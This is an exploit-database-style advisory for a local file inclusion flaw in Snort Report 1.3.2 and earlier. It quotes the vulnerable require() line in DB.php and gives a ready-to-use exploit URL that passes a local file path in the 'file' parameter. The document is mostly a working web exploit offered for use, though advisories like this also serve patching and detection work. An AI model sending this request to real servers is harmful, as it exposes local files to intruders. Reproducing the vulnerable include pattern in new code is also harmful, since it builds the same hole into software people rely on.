# Exploit Title: Snort Report Local File Inclusion # Date: 05/02/2012 # Author: T0x!c # Software Link: http://www.symmetrixtech.com/ids/snortreport-1.3.2.tar.gz # Version: <= 1.3.2 # Platform: PHP ########################## -=[ vuln c0de ]=- "/DB.php" 59 $file = join("", array("DB_", $dbtype, ".php")); 60 require($file); ----exploit---- http://server/Path/DB.php?file=[Local File] ##########################